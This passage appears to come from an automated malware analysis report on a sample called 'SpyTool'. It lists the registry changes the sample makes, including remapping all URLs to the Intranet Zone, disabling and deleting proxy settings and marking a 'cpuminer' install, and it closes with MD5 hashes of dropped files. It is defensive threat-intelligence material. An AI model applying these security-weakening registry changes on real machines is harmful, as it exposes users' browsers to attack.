"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 DE 10 E4 FD 80 9B 01 45 0A 08 D1 05 4C 59 5D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process encrypt.exe:1060 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 60 DA 48 2E 36 20 01 29 25 8F 09 F7 BD 57 B3"
The process encrypt.exe:1476 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 3D 4C 0F E0 AC D8 74 FC 9C 20 4D 2F 40 B6 2C"
The process encrypt.exe:1100 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 72 B0 F9 7C C7 F3 9E FE 0A C7 48 8A EA 59 AC"
The process encrypt.exe:1584 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A F9 6D 5A 47 92 CC 95 F5 82 23 CB 85 FB F5 19"
The process nsx1C.tmp:1896 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 31 28 B7 F5 CC BE 98 97 2D DC 89 51 BC E8 47"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process nsx1C.tmp:1088 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 0B 0D FC 04 2B 9F AF 65 DF FD D3 C4 73 AB 07"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst25.tmp:1804 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj29.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 11 5F 00 8D DD 9F 67 76 1C 59 9F DD 8C 61 1E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nso3D.tmp:3724 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E E1 25 3E 1F C3 9E C3 01 DF 89 6A 2B 06 62"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web-nodes (names with no dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsk6.tmp:204 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 86 39 8C 5F 02 5F 7B B9 B9 46 94 6E 16 AB 90"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-imi-tot-cpm-opw-crb-crr"
The process %original file name%.exe:1736 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 C0 BD C9 92 5B 4B 60 B1 AC 35 F4 59 FD 75 46"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
The SpyTool modifies IE security zone settings so that all local web-nodes (names with no dots) that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3554\setup.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\9823.exe |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\inetc.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd20.tmp\registry.dll |
fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsnD.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso23.tmp\registry.dll |
029aa26a0dd5ef7bd1ba1639703f8fae | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr19.tmp |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx1C.tmp |
5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe |
029aa26a0dd5ef7bd1ba1639703f8fae | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
67eda82fc3df3349df44916f6efe55bf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe |
1f71f441cb13035d10d8b6979a628dda | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
